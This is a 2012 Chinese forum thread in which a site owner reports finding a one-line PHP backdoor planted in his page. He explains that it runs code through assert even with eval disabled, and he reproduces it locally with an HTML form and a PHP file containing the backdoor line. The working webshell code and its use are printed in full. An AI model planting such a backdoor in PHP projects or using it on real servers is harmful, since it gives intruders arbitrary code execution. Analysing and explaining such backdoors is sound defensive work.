某人在我一个页面里留下了这个

osiris · 发表于 2012-2-16 21:02:54

标志下

miniloop · 发表于 2012-2-16 15:13:27

本帖最后由 miniloop 于 2012-2-16 17:42 编辑

莫名奇妙就负载奇高，默默地查了一晚上，发现某人在一个php页面里留下了这个

@ $_GET['page']($_POST['item']);

复制代码

这不就是传说中的一句话后门么？

======================================
编辑for更新

黑阔厉害啊，尼玛查半天终于知道他是怎样搞的了。
由于我装系统的时候就禁用了eval，他不可能用，网上查了半天知道了
assert也可以直接执行php代码。
现在在本机模拟了下。

建一个post.html

<form action = "test.php?page=assert" method = "post">
<input type = "text" name = "item" />
<input type = "submit" value = "运行" />
</form>

复制代码

复制代码
再建一个test.php

<?php $_GET['page']($_POST['item']); ?>

复制代码

复制代码
这个post.html在任何电脑上运行都可以，只要action的地址是那个test.php.

在输入框里输入： phpinfo(); 点击运行按钮，
尼玛 phpinfo就直接出来啦，太可怕了，这可以为所欲为了啊

dfdfdf.gif (5.61 KB, 下载次数: 3)

dfdfdfttt.gif (12.51 KB, 下载次数: 0)

zyzit · 发表于 2012-2-16 15:14:32

本帖最后由 zyzit 于 2012-2-16 15:14 编辑

我不会这个没学过PHP

勇少 · 发表于 2012-2-16 15:14:44

看不懂

light · 发表于 2012-2-16 15:14:55

不懂

whos · 发表于 2012-2-16 15:19:30

miniloop · 发表于 2012-2-16 15:25:44

如果 page = eval 的话，那item就可以是任何php语句了。
但是我已经禁止了eval的啊，他怎么还能执行php呢

geyunbing · 发表于 2012-2-16 15:26:16

提示: 作者被禁止或删除内容自动屏蔽

用户名 · 发表于 2012-2-16 15:29:55

类似

wdlth · 发表于 2012-2-16 15:34:17

是一句话后门

		自动登录	找回密码
密码			注册

geyunbing geyunbing 当前离线积分 5217	8^# 发表于 2012-2-16 15:26:16 \| 只看该作者提示: 作者被禁止或删除内容自动屏蔽
geyunbing geyunbing 当前离线积分 5217
	回复支持反对举报

某人在我一个页面里留下了这个

评分